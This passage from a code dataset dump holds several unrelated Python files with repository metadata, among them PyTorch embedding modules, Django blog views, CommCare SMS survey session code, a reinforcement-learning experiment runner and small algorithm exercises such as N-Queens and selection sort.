self.d_model = d_model\n self.max_len = max_len\n self.net = nn.Linear(1, d_model)\n # self.emb = nn.Embedding(max_len, 2 * d_model)\n\n def forward(self, idx):\n # [B * T, 1]\n idx = idx.reshape(-1, 1)\n emb = self.net(idx.float()).reshape(-1, self.d_model)\n zero, rest = emb.split([1, self.d_model - 1], dim=-1)\n return torch.cat([zero, rest.sin()], dim=-1)\n\n\nclass Base2Embedding(nn.Module):\n def __init__(self, max_len, d_model):\n super().__init__()\n self.d_model = d_model\n self.max_len = max_len\n mask = 2 ** torch.arange(d_model)\n # Overflow, zero these for sanity\n # seq_len <= 65536\n mask[16:] = mask[16]\n assert max_len < 2**16 - 1\n self.register_buffer(\"mask\", mask)\n\n def forward(self, idx):\n return idx.unsqueeze(-1).bitwise_and(self.mask).ne(0).float()\n\n\nclass PerceptronEmbedding(nn.Module):\n def __init__(self, max_len, d_model):\n super().__init__()\n self.d_model = d_model\n self.lin = nn.Linear(1, d_model, bias=False)\n\n def forward(self, idx):\n idx = idx.float()\n return self.lin(idx.reshape(-1, 1)).sin()\n\n\nclass SoftExponentialEmbedding(nn.Module):\n def __init__(self, max_len, d_model):\n super().__init__()\n self.d_model = d_model\n # nn.Parameter expects a tensor, not a plain python list\n self.a = nn.Parameter(torch.tensor([-1.0]))\n self.lin = nn.Linear(1, d_model, bias=False)\n\n def forward(self, idx):\n idx = idx.float()\n self.a.data = self.a.data.clamp_(-1.0, 1e-4)\n # soft-exponential transform of the timestep before projecting\n # (assumed intent; this expression's result was previously discarded)\n idx = (torch.exp(self.a * idx) - 1) / self.a + self.a\n return self.lin(idx.reshape(-1, 1)).sin()\n","repo_name":"proroklab/popgym","sub_path":"popgym/baselines/models/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":9855,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"21"} +{"seq_id":"25532818657","text":"import pandas as pd\n\ndf = pd.read_csv('./data/poll/province_poll_data.csv')\ndf['Date'] = df['Time'].apply(lambda datestring: pd.to_datetime(datestring))\n\nnational = df[df['Province'] == 'National']\nnational = national.sort_values('Date', ascending=False)\nnational = national.reset_index()\nlastDate = national['Date'][0]\n\ndf = df[df['Date'] == lastDate]\n\ndef get_max(row):\n if row['Liberals'] > row['NDP'] and row['Liberals'] > row['Conservative']:\n return 'Liberals'\n elif row['Conservative'] > row['NDP'] and row['Conservative'] > row['Liberals']:\n return 'Conservative'\n else:\n return 'NDP'\ndf['Max'] = df.apply(get_max, axis=1)\n\ncolumns = ['Conservative', 'Liberals', 'NDP', 'Province', 'Max']\ndf = df[columns]\n\ndf.to_json('./dashboard/public/static/poll_data_processed.json', orient='records')","repo_name":"Abhishek-Sunnak/PR-Management-App-Canada-Elections","sub_path":"dashboard_scripts/poll/poll_data_processed.py","file_name":"poll_data_processed.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39218131872","text":"#encoding=utf-8\nimport markdown\n\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponseRedirect\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.contrib import messages\n\nfrom taggit.models import Tag\n\n\nfrom .models import Article, Famouswords, Comment, Category\nfrom .forms import CommentForm\n# Create your views here.\n\ndef index(request, tag_slug=None):\n article_list = Article.objects.all()\n tags = Tag.objects.all()\n categories = Category.objects.all()\n indexword = Famouswords.objects.order_by('?')[:1]\n tag = None\n\n if tag_slug:\n tag = 
get_object_or_404(Tag, slug=tag_slug)\n article_list = article_list.filter(tags__in=[tag])\n\n paginator = Paginator(article_list, 5)\n page = request.GET.get('page')\n\n try:\n articles = paginator.page(page)\n except PageNotAnInteger:\n articles = paginator.page(1)\n except EmptyPage:\n articles = paginator.page(paginator.num_pages)\n\n context = {'articles': articles,\n 'indexword': indexword,\n 'categories': categories,\n 'tags': tags}\n\n return render(request, 'index.html', context)\n\n\ndef article_page(request, article_id):\n article = get_object_or_404(Article, pk=article_id)\n\n comments = article.comments.filter(active=True)\n\n if request.method == 'POST':\n comment_form = CommentForm(data=request.POST)\n if comment_form.is_valid():\n new_comment = comment_form.save(commit=False)\n new_comment.article = article\n new_comment.save()\n messages.success(request, '评论已经提交')\n return HttpResponseRedirect(article.get_absolute_url())\n else:\n comment_form = CommentForm()\n article.content = markdown.markdown(article.content,\n extensions=[\n 'markdown.extensions.extra',\n 'markdown.extensions.codehilite',\n 'markdown.extensions.toc',\n ])\n context = {'article': article,\n 'comments': comments,\n 'comment_form': comment_form}\n return render(request, 'article_page.html', context)\n\n\ndef article_change(request, article_id):\n return render(request, 'article_change.html')\n\n\ndef tag_list(request):\n tags = Tag.objects.all()\n return render(request, 'tag_list.html', {'tags': tags})\n\ndef about_me(request):\n return render(request, 'about.html')\n\n\n\n","repo_name":"kaiaiz/django_mytweets","sub_path":"application/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32853403401","text":"from .models import XFormsSession, XFORMS_SESSION_SMS\nfrom datetime import datetime\nfrom corehq.apps.cloudcare.touchforms_api import get_session_data\nfrom touchforms.formplayer.api import (\n XFormsConfig,\n DigestAuth,\n get_raw_instance,\n InvalidSessionIdException,\n)\nfrom touchforms.formplayer import sms as tfsms\nfrom django.conf import settings\nfrom xml.etree.ElementTree import XML, tostring\nfrom dimagi.utils.parsing import json_format_datetime\nfrom corehq.apps.receiverwrapper.util import get_submit_url\nfrom receiver.util import spoof_submission\nfrom couchforms.models import XFormInstance\nimport re\n\nCOMMCONNECT_DEVICE_ID = \"commconnect\"\n\nAUTH = DigestAuth(settings.TOUCHFORMS_API_USER, \n settings.TOUCHFORMS_API_PASSWORD)\n\ndef start_session(domain, contact, app, module, form, case_id=None, yield_responses=False, session_type=XFORMS_SESSION_SMS, case_for_case_submission=False):\n \"\"\"\n Starts a session in touchforms and saves the record in the database.\n \n Returns a tuple containing the session object and the (text-only) \n list of generated questions/responses based on the form.\n \n Special params:\n yield_responses - If True, the list of xforms responses is returned, otherwise the text prompt for each is returned\n session_type - XFORMS_SESSION_SMS or XFORMS_SESSION_IVR\n case_for_case_submission - True if this is a submission that a case is making to alter another related case. 
For example, if a parent case is filling out\n an SMS survey which will update its child case, this should be True.\n \"\"\"\n # NOTE: this call assumes that \"contact\" will expose three\n # properties: .raw_username, .get_id, and .get_language_code\n session_data = get_session_data(domain, contact, case_id, device_id=COMMCONNECT_DEVICE_ID)\n \n # since the API user is a superuser, force touchforms to query only\n # the contact's cases by specifying it as an additional filterp\n if contact.doc_type == \"CommCareCase\":\n session_data[\"additional_filters\"] = {\n \"case_id\": contact.get_id,\n \"footprint\" : \"True\",\n \"include_children\" : \"True\" if case_for_case_submission else \"False\",\n }\n else:\n session_data[\"additional_filters\"] = { \"user_id\": contact.get_id }\n \n language = contact.get_language_code()\n config = XFormsConfig(form_content=form.render_xform(),\n language=language,\n session_data=session_data,\n auth=AUTH)\n \n \n now = datetime.utcnow()\n # just use the contact id as the connection id. may need to revisit this\n connection_id = contact.get_id\n session_start_info = tfsms.start_session(config)\n session = XFormsSession(connection_id=connection_id,\n session_id = session_start_info.session_id,\n start_time=now, modified_time=now, \n form_xmlns=form.xmlns,\n completed=False, domain=domain,\n app_id=app.get_id, user_id=contact.get_id,\n session_type=session_type)\n session.save()\n responses = session_start_info.first_responses\n # Prevent future resource conflicts by getting the session again from the db\n # since the session could have been updated separately in the first_responses call\n session = XFormsSession.get(session._id)\n if yield_responses:\n return (session, responses)\n else:\n return (session, _responses_to_text(responses))\n\ndef get_responses(msg):\n return _get_responses(msg.domain, msg.couch_recipient, msg.text)\n\ndef _get_responses(domain, recipient, text, yield_responses=False, session_id=None, update_timestamp=True):\n \"\"\"\n Try to process this message like a session-based submission against\n an xform.\n \n Returns a list of responses if there are any.\n \"\"\"\n session = None\n if session_id is not None:\n if update_timestamp:\n # The IVR workflow passes the session id\n session = XFormsSession.latest_by_session_id(session_id)\n else:\n # The SMS workflow grabs the open sms session\n session = XFormsSession.get_open_sms_session(domain, recipient)\n if session is not None:\n session_id = session.session_id\n\n if update_timestamp and session is not None:\n session.modified_time = datetime.utcnow()\n session.save()\n\n if session_id is not None:\n # TODO auth\n if yield_responses:\n return list(tfsms.next_responses(session_id, text, auth=None))\n else:\n return _responses_to_text(tfsms.next_responses(session_id, text, auth=None))\n\ndef _responses_to_text(responses):\n return [r.text_prompt for r in responses if r.text_prompt]\n\n\"\"\"\nGets the raw instance of the session's form and submits it. 
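A typical call might look like submit_unfinished_form(session_id, include_case_side_effects=False), where session_id identifies an open smsforms session (a hypothetical usage sketch, not an example taken from this codebase). 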
This is used with\nsms and ivr surveys to save all questions answered so far in a session that \nneeds to close.\n\nIf include_case_side_effects is False, no case create / update / close actions\nwill be performed, but the form will still be submitted.\n\nThe form is only submitted if the smsforms session has not yet completed.\n\"\"\"\ndef submit_unfinished_form(session_id, include_case_side_effects=False):\n session = XFormsSession.latest_by_session_id(session_id)\n if session is not None and session.end_time is None:\n # Get and clean the raw xml\n try:\n xml = get_raw_instance(session_id)\n except InvalidSessionIdException:\n session.end(completed=False)\n session.save()\n return\n root = XML(xml)\n case_tag_regex = re.compile(\"^(\\{.*\\}){0,1}case$\") # Use regex in order to search regardless of namespace\n meta_tag_regex = re.compile(\"^(\\{.*\\}){0,1}meta$\")\n timeEnd_tag_regex = re.compile(\"^(\\{.*\\}){0,1}timeEnd$\")\n current_timstamp = json_format_datetime(datetime.utcnow())\n for child in root:\n if case_tag_regex.match(child.tag) is not None:\n # Found the case tag\n case_element = child\n case_element.set(\"date_modified\", current_timstamp)\n if not include_case_side_effects:\n # Remove case actions (create, update, close)\n child_elements = [case_action for case_action in case_element]\n for case_action in child_elements:\n case_element.remove(case_action)\n elif meta_tag_regex.match(child.tag) is not None:\n # Found the meta tag, now set the value for timeEnd\n for meta_child in child:\n if timeEnd_tag_regex.match(meta_child.tag):\n meta_child.text = current_timstamp\n cleaned_xml = tostring(root)\n \n # Submit the xml and end the session\n resp = spoof_submission(get_submit_url(session.domain, session.app_id), cleaned_xml, hqsubmission=False)\n xform_id = resp['X-CommCareHQ-FormID']\n session.end(completed=False)\n session.submission_id = xform_id\n session.save()\n \n # Tag the submission as a partial submission\n xform = XFormInstance.get(xform_id)\n xform.partial_submission = True\n xform.survey_incentive = session.survey_incentive\n xform.save()\n\n\n","repo_name":"gmimano/commcaretest","sub_path":"corehq/apps/smsforms/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71105982452","text":"import os\nimport re\nimport pandas as pd\nimport xml.etree.ElementTree as ET\n\n# extract questions from cleaned corpus ==> list of tuples [(context_previous, question, context_next)] ==> dataframe ==> csv\n\ndef get_tags(file_path, tag):\n root = ET.parse(file_path).getroot()\n tags = [t for t in root.iter(tag)]\n return tags\n\ndef check_discourse_markers(text):\n discourse_markers = ['ah oui ?', 'ah bon ?', 'oui ?', 'hein ?']\n for marker in discourse_markers:\n if text == marker :\n return False\n return True\n\ndef get_previous_context(i, tags):\n context_p = ''\n for o in range(4, -1, -1):\n if tags[i-o-1] != '\\n':\n speaker_p = '#' + tags[i-o-1].attrib['speaker'].strip('\\n')\n context_p += (speaker_p + tags[i-o-1].text.strip('\\n')+ ' | ')\n return context_p\n\ndef get_next_text(i, tags):\n context_n = ''\n for o in range(5):\n if tags[i+o+1] != '\\n':\n speaker_n = '#' + tags[i+o+1].attrib['speaker'].strip('\\n') + ' : '\n context_n += (speaker_n + tags[i+o+1].text.strip('\\n') + ' | ')\n return context_n\n\ndef get_questions_with_contexts(dir):\n questions_with_contexts = []\n for file in os.listdir(dir):\n file_path = os.path.join(dir, 
file)\n tags = get_tags(file_path, 'Turn')\n try:\n for i in range(5, len(tags)-5):\n tag = tags[i]\n text = tag.text\n try:\n for t in text.split('\\n'):\n if '?' in t and check_discourse_markers(t):\n speaker = '#' + tag.attrib['speaker'] + ' : '\n t = speaker + t\n context_p = get_previous_context(i, tags)\n context_n = get_next_text(i, tags)\n questions_with_contexts.append((context_p, t, context_n))\n except:\n pass\n except:\n pass\n return questions_with_contexts\n\ndef replace_crlf(text):\n # return the collapsed text so that Series.apply keeps the values\n return re.sub(r\"\\n+\", \"\\n\", text)\n\nif __name__ == \"__main__\":\n questions_with_contexts = get_questions_with_contexts('../cleaned_eslo_entretien')\n df = pd.DataFrame(questions_with_contexts, columns=['previous_5_turn', 'question', 'next_5_turn'])\n df.previous_5_turn = df.previous_5_turn.apply(replace_crlf)\n df.next_5_turn = df.next_5_turn.apply(replace_crlf)\n df.to_csv('eslo_entretien.csv', sep=';', encoding='utf8')","repo_name":"kittog/questionSponPrep","sub_path":"corpus/ESLO/scripts/extract_question_eslo.py","file_name":"extract_question_eslo.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10076958198","text":"'''\n1228. Missing Number In Arithmetic Progression\nIn some array arr, the values were in arithmetic progression: the values arr[i+1] - arr[i] are all equal for every 0 <= i < arr.length - 1.\n\nThen, a value from arr was removed that was not the first or last value in the array.\n\nReturn the removed value.\n\n\n\nExample 1:\n\nInput: arr = [5,7,11,13]\nOutput: 9\nExplanation: The previous array was [5,7,9,11,13].\nExample 2:\n\nInput: arr = [15,13,12]\nOutput: 14\nExplanation: The previous array was [15,14,13,12].\n\n\nConstraints:\n\n3 <= arr.length <= 1000\n0 <= arr[i] <= 10^5\n'''\n\n\nclass Solution(object):\n def missingNumber(self, arr):\n \"\"\"\n :type arr: List[int]\n :rtype: int\n \"\"\"\n if arr[-1] < arr[0]:\n arr = arr[::-1]\n a = min(arr[1] - arr[0], arr[-1] - arr[-2])\n if a == 0:\n return arr[0]\n\n # integer division keeps the result an int on Python 3;\n # both divisions are exact for an arithmetic progression\n num = (arr[-1] - arr[0]) // a + 1\n # print(a, num)\n sum_ = (arr[0] + arr[-1]) * num // 2\n\n return sum_ - sum(arr)\n","repo_name":"MecaCho/algorithms_training","sub_path":"algorithms/binary_search/leetcode-1228-MissingNumberInArithmeticProgression.py","file_name":"leetcode-1228-MissingNumberInArithmeticProgression.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28178024692","text":"class Queens:\r\n def nQueens(self, n):\r\n self.count = 0\r\n self.a = [0 for i in range(n+1)]\r\n self.Queens1(1,n)\r\n return self.count\r\n\r\n def Queens1(self,i,n):\r\n if i > n:\r\n self.count += 1\r\n return\r\n for j in range(1, n+1):\r\n self.a[i] = j\r\n if self.Place(i):\r\n self.Queens1(i+1, n)\r\n\r\n def Place(self, i):\r\n for j in range(1, i):\r\n if self.a[j]==self.a[i] or self.a[j]-self.a[i]==j-i or self.a[j]-self.a[i]==i-j:\r\n return 0\r\n return 
1\r\n","repo_name":"jasonusaco/Leetcode-Practice","sub_path":"DP&Recursion/9.9.py","file_name":"9.9.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40239957791","text":"import sys\nimport os\nimport json\nimport pickle\nimport shutil\nimport random\nimport time\nimport itertools\nimport argparse\n\nimport torch\nimport numpy as np\nimport importlib\nimport matplotlib.pyplot as plt\n\nfrom project.policies import EpsilonGreedyPolicy\nfrom project.test_network import test_episodes\nfrom project.train_network import train_episodes\n\n# constants\nENV_KEY = 'environments'\nNET_KEY = 'networks'\nBAT_KEY = 'batch-sizes'\nDIS_KEY = 'discount-factors'\nGRA_KEY = 'semi-gradient'\nLAYER_KEY = 'nn_layers'\nTRAIN_EPS_KEY = 'train-episodes'\nTEST_EPS_KEY = 'test-episodes'\nLR_KEY = 'lr'\nLR_SS_KEY = 'lr_step_size'\nLR_GAMMA_KEY = 'lr_gamma'\nREP_MEM_KEY = 'replay_memory'\nSEED_KEY = 'seed'\n\n# settings\nseed_base = 42\nnum_runs = 30\noverwrite_existing_files = False\n# config_file = \"experiments_config_windy.json\"\nsave_dir = \"saved_experiments\"\n\n\ndef load_config(config_file):\n \"\"\"\n Loads the experiment configurations from the json file specified by 'config_file'.\n Convert environment and module strings to classes\n \"\"\"\n\n def init_classes(config, module_name):\n # Convert class name strings to class instances\n for i in range(len(config[module_name])):\n module = importlib.import_module(f'project.{module_name}')\n class_name = config[module_name][i]\n config[module_name][i] = getattr(module, class_name)\n\n with open(config_file) as f:\n config = json.load(f)\n\n init_classes(config, ENV_KEY)\n init_classes(config, NET_KEY)\n\n return config\n\n\ndef get_file_name_and_config(env,\n net,\n batch_size,\n discount_factor,\n semi_gradient,\n lr,\n lr_step_size,\n lr_gamma,\n layer,\n num_episodes,\n replay_memory,\n seed):\n\n \"\"\" Returns a unique file name based on the provided arguments and a config dict is returned with which\n the provided argument values can be accessed. \"\"\"\n\n gradient_mode = 'semi' if semi_gradient else 'full'\n env_name = env.__name__\n net_name = net.__name__\n file_name = f'{gradient_mode}/{env_name}/{net_name}_{batch_size}_{discount_factor}_{semi_gradient}_' \\\n f'{lr}_{lr_step_size}_{lr_gamma}_{layer}_{num_episodes}_{replay_memory}_{seed}'\n\n current_config = {\n ENV_KEY: env_name,\n NET_KEY: net_name,\n BAT_KEY: batch_size,\n DIS_KEY: discount_factor,\n GRA_KEY: gradient_mode,\n LR_KEY: lr,\n LR_SS_KEY: lr_step_size,\n LR_GAMMA_KEY: lr_gamma,\n LAYER_KEY: layer,\n SEED_KEY: seed,\n TRAIN_EPS_KEY: num_episodes,\n REP_MEM_KEY: replay_memory\n }\n\n return file_name, current_config\n\n\ndef set_seeds(seed, env):\n \"\"\" For reproducibility, seeds 'random', 'numpy', 'PyTorch' and the gym 'env' with the provided seed. \"\"\"\n \n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n env.seed(seed)\n\n\ndef save_file(results, current_config, file_name):\n \"\"\"\n Pickles the results.\n :param results: The experiment results.\n :param current_config: The config dict.\n :param file_name: The name for the pickle file. 
This name should be unique to the experiment parameters.\n :return: None\n \"\"\"\n\n (episode_durations_train,\n losses,\n episode_rewards_train,\n timespan,\n episode_durations_test,\n episode_rewards_test,\n q_vals) = results\n\n \"\"\"\n Save the results to specified file\n \"\"\"\n\n data = {\n \"config\": current_config,\n \"train\": {\n \"episode_durations\": episode_durations_train,\n \"episode_rewards\": episode_rewards_train,\n \"losses\": losses,\n \"duration\": timespan,\n \"q_vals\": q_vals\n },\n \"test\": {\n \"episode_durations\": episode_durations_test,\n \"episode_rewards\": episode_rewards_test\n }\n }\n pickle.dump(data, open(f'{save_dir}/{file_name}.pkl', 'wb'))\n\n\ndef smooth(x, N):\n \"\"\" Smooths the values provided in 'x'. N defines over how many consecutive values to smooth. \"\"\"\n cumsum = np.cumsum(np.insert(x, 0, 0))\n return (cumsum[N:] - cumsum[:-N]) / float(N)\n\n\ndef save_side_plot(plot_1, plot_1_name, plot_2, plot_2_name, file_name, extension='pdf'):\n \"\"\" Saves two plots side by side. \"\"\"\n\n fig, axes = plt.subplots(nrows=1, ncols=2)\n axes[0].plot(plot_1)\n axes[0].set_title(plot_1_name)\n axes[1].plot(plot_2)\n axes[1].set_title(plot_2_name)\n fig.tight_layout()\n plt.savefig(f'{save_dir}/{file_name}.{extension}')\n plt.close(fig)\n\n\ndef save_train_plot(episode_durations, episode_losses, file_name, smoothing=10):\n \"\"\" Plots and saves the training results. \"\"\"\n\n save_side_plot(smooth(episode_durations, smoothing), 'Episode durations per episode',\n smooth(episode_losses, smoothing), 'Average loss per episode',\n file_name + '_train')\n\n\ndef save_test_plot(episode_durations, episode_rewards, file_name, smoothing=10):\n \"\"\" Plots and saves the testing results. \"\"\"\n\n save_side_plot(smooth(episode_durations, smoothing), 'Episode durations per episode',\n smooth(episode_rewards, smoothing), 'Rewards per episode',\n file_name + '_test')\n\n\ndef do_loop(config, func):\n \"\"\" Creates the cartesian product from all lists in config.\n Each iteration from do_loop runs 'func' once with the next element in this cartesian product. \"\"\"\n\n runs_settings = itertools.product(config[ENV_KEY],\n config[NET_KEY],\n config[BAT_KEY],\n config[DIS_KEY],\n config[GRA_KEY],\n config[LAYER_KEY],\n config[LR_KEY],\n config[LR_SS_KEY],\n config[LR_GAMMA_KEY],\n config[REP_MEM_KEY])\n\n for run_settings in runs_settings:\n yield func(*run_settings, config)\n\n\ndef run(env, net, batch_size, discount_factor, semi_gradient, layer, lr, lr_step_size, lr_gamma, replay_mem, config):\n \"\"\"\n Runs the experiments.\n :param env: The environment on which to run the experiments.\n :param net: The network used for the experiments.\n :param batch_size: The size of the batches sampled from the replay memory buffer.\n :param discount_factor: The discount factor with which to scale the Q values of the next step.\n :param semi_gradient: Whether to use semi gradient or full gradient.\n :param layer: A list where each element is the number of nodes in a layer in the network.\n :param lr: The learning rate.\n :param lr_step_size: For the learning rate scheduler. 
After how many episodes to scale the learning rate.\n :param lr_gamma: The scaling factor for the learning rate scheduler.\n :param replay_mem: The size of the memory replay buffer.\n :param config: The config dict with which to access the parameters for this specific experiments.\n :return: None\n \"\"\"\n\n # saves the Q values for environments A-Split and N-State Random Walk\n save_q_vals = env.__name__ in ['ASplit', 'NStepRandomWalk']\n for seed_iter in range(num_runs):\n seed = seed_base + seed_iter # next seed\n\n for num_episodes in config[TRAIN_EPS_KEY]:\n file_name, current_config = get_file_name_and_config(env=env,\n net=net,\n batch_size=batch_size,\n discount_factor=discount_factor,\n semi_gradient=semi_gradient,\n lr=lr,\n lr_step_size=lr_step_size,\n lr_gamma=lr_gamma,\n layer=layer,\n num_episodes=num_episodes,\n replay_memory=replay_mem,\n seed=seed)\n\n print('Running: ', current_config)\n\n # Skip the current run if the data file already exists\n if os.path.isfile(f'{save_dir}/{file_name}.pkl'):\n print('Data file for the current run already exists. Skip it.')\n continue\n\n os.makedirs(f'{save_dir}/{os.path.dirname(file_name)}', exist_ok=True)\n\n # Instantiate environment object\n env_ins = env()\n\n # set the seeds in every iteration\n set_seeds(seed, env=env_ins)\n\n # Instantiate network object by hyperparameters\n net_ins = net(in_features=env_ins.shape,\n out_features=env_ins.action_space.n,\n architecture=layer,\n discount_factor=discount_factor)\n policy = EpsilonGreedyPolicy(net_ins)\n\n # Start training\n start = time.time()\n\n episode_durations_train, losses, episode_rewards_train, q_vals = train_episodes(env=env_ins,\n policy=policy,\n num_episodes=num_episodes,\n batch_size=batch_size,\n learn_rate=lr,\n semi_grad=semi_gradient,\n use_replay=True,\n lr_step_size=lr_step_size,\n lr_gamma=lr_gamma,\n save_q_vals=save_q_vals,\n replay_mem_size=replay_mem)\n timespan = time.time() - start\n print(f'Training finished in {timespan} seconds')\n\n torch.save(net_ins.state_dict(), f'{save_dir}/{file_name}.pt') # save the NN weights\n\n save_train_plot(episode_durations_train, losses, file_name)\n\n # Start testing\n episode_durations_test = list()\n episode_rewards_test = list()\n\n if config[TEST_EPS_KEY] > 0:\n test_start = time.time()\n current_config[TEST_EPS_KEY] = config[TEST_EPS_KEY]\n print(f'Start running {config[TEST_EPS_KEY]} episodes for test')\n\n episode_durations_test, episode_rewards_test = test_episodes(env_ins, policy, config[TEST_EPS_KEY])\n print(f'Test finished in {time.time() - test_start} seconds')\n\n save_test_plot(episode_durations_test, episode_rewards_test, file_name)\n\n results = (episode_durations_train, losses, episode_rewards_train,\n timespan, episode_durations_test, episode_rewards_test, q_vals)\n\n # Save results\n save_file(results, current_config, file_name)\n\n\ndef main(experiment_file):\n \"\"\" Loads the configurations for the experiments and run them. 
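A minimal config file might look like the following sketch; the environment\n and network names here are placeholders for classes that must exist in\n project.environments and project.networks:\n\n {\n \"environments\": [\"CartPole\"],\n \"networks\": [\"QNetwork\"],\n \"batch-sizes\": [32],\n \"discount-factors\": [0.99],\n \"semi-gradient\": [true],\n \"nn_layers\": [[128, 128]],\n \"lr\": [0.001],\n \"lr_step_size\": [100],\n \"lr_gamma\": [0.9],\n \"replay_memory\": [10000],\n \"train-episodes\": [200],\n \"test-episodes\": 20\n }\n 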
\"\"\"\n\n if overwrite_existing_files:\n answer = input(\n \"\"\"\n Do you want to overwrite all the saved files?\n All the files will be deleted before starting.\n (y/n) \"\"\")\n\n if answer == 'y':\n try:\n shutil.rmtree(save_dir)\n time.sleep(1)\n except:\n print('Error, perhaps some files are read-only.')\n\n os.makedirs(save_dir)\n else:\n sys.exit(0)\n\n # The configurations for this experiment.\n config = load_config(experiment_file)\n\n # Each iteration in the loop performs one experiment.\n for _ in do_loop(config, run):\n pass\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Run experiments.')\n parser.add_argument('file', type=str, help='The experimental file name.')\n parser.add_argument('--save_dir', type=str, default=\"saved_experiments\",\n help='Directory to save results to.')\n args = parser.parse_args()\n save_dir = args.save_dir\n main(args.file)\n\n# ========================================================================= #\n# Memorial for the best for for for ... for loop ever coded: #\n# ========================================================================= #\n\n# def do_loop(config, func):\n# for env in config[ENV_KEY]:\n# for net in config[NET_KEY]:\n# for batch_size in config[BAT_KEY]:\n# for discount_factor in config[DIS_KEY]:\n# for semi_gradient in config[GRA_KEY]:\n# for layer in config[LAYER_KEY]:\n# for lr in config[LR_KEY]:\n# for lrss in config[LR_SS_KEY]:\n# for lr_gamma in config[LR_GAMMA_KEY]:\n# for replay_memory in config[REP_MEM_KEY]:\n# yield func(env, net, batch_size, discount_factor, semi_gradient,\n# layer, lr, lrss, lr_gamma, replay_memory, config)\n","repo_name":"tom-kersten/Reinforcement_Learning_Project","sub_path":"run_experiments.py","file_name":"run_experiments.py","file_ext":"py","file_size_in_byte":14189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22904411582","text":"# Best case o(n^2)\n# Average case o(n^2)\n# Worst case o(n^2)\n\n#Bu ilk yaptığım kendi düşüncemle bu da O(n^2) fakat içeride 3 tane constant var ve çok çok az da olsa performans kaybı olabilir.\ndef selectionSort(arr):\n for i in range(0, len(arr)):\n for j in range(i+1, len(arr)):\n print(j)\n if(arr[i] > arr[j]):\n tmp = arr[i]\n arr[i] = arr[j] \n arr[j] = tmp\n return arr\n\n\ndef selectionSort2(arr):\n # Neden len arr -1 dedim çünkü sondan bir önceki indexe geldiğinde 1 tane rakam kalıyor geriye onuda j kontrol edip yer değiştirecek yada\n # değiştirmeyecek eğer son indexede giderse eğer j nin bir sonraki rakamı olmayacak ve hata vermez ama boş yere range ile boş bir değer oluşturacak.\n # list(range(6,6)) --> boş bir liste dönderecektir.\n for i in range(0, len(arr)-1):\n print(arr, i)\n min = i\n for j in range(i+1, len(arr)):\n # print(j)\n # burada yer değiştirme olmuyor sadece fake bir şekilde indexini tutuyoruz döngü bittikten sonra yer değiştirme gerçekleşiyor...\n if(arr[min] > arr[j]):\n min = j\n tmp = arr[i]\n arr[i] = arr[min] \n arr[min] = tmp\n return arr\n\n\nprint(selectionSort2([5,4,1,2,0,-1]))\n","repo_name":"merthamit/Over-300-leetcode-solutions","sub_path":"sorting algorithms/selection-sort.py","file_name":"selection-sort.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"24643475065","text":"# initialize an empty list\n\nl = []\n\n# add elements to list\n\nl.append(1)\n\n# initialize a dictionary\n\nd = {}\n\n# add elements to 
dictionary\n\nd['a'] = 1\n\n\n# create a class\n\n\nclass Person:\n\n def __init__(self, name):\n self.name = name\n\n def say_hello(self):\n print(\"Hello\", self.name)\n\n\n# instantiate the class\nob = Person(\"Parav\")\n\n# call a method of an object\nob.say_hello()\n","repo_name":"paravsingla/codemania-ai","sub_path":"Day 1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"71435516853","text":"#!/usr/bin/env python3\n__author__ = 'mgooch'\nfrom BioinformaticsFunctions import *\ndebug = True\nimport sys\nlines = sys.stdin.read().splitlines()\npattern = lines[0]\ngenome = lines[1]\nd = int(lines[2])\nif 'debug' in globals():\n\tprint(\"pattern : %s\" % pattern)\n\tprint(\"genome : %s\" % genome)\n\tprint(\"d : %d\" % d)\n\npositions = ApproximatePatternSearch(pattern, genome, d)\nprint(\" \".join(str(x) for x in positions))\n","repo_name":"kotoroshinoto/Coursera_Python_Bioinformatics","sub_path":"Course1/ApproximatePatternSearch.py","file_name":"ApproximatePatternSearch.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71615657334","text":"n = int(input())\ns = input()\n\nres = (n*(n-1)) // 2\n\nfor i in range(2):\n cont = 1\n for a in range(1,n):\n if s[a] == s[a-1]:\n cont += 1\n else:\n res -= cont - i\n cont = 1\n s = s[::-1]\nprint(res)\n","repo_name":"fernandozanutto/competitive_programming","sub_path":"Codeforces/1238/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"35245480692","text":"import sys\n\ndef recur( size):\n global R, C\n if size == 1:\n return R * 2 + C\n\n area = (size//2) * (size//2) \n _r = R//(size/2)\n _c = C//(size/2)\n\n R -= (size//2) * _r\n C -= (size//2) * _c \n\n return area * (_r * 2 + _c) + recur(size//2)\n\n\nif __name__ == \"__main__\":\n input = sys.stdin.readline\n n, R, C = map(int, input().split(\" 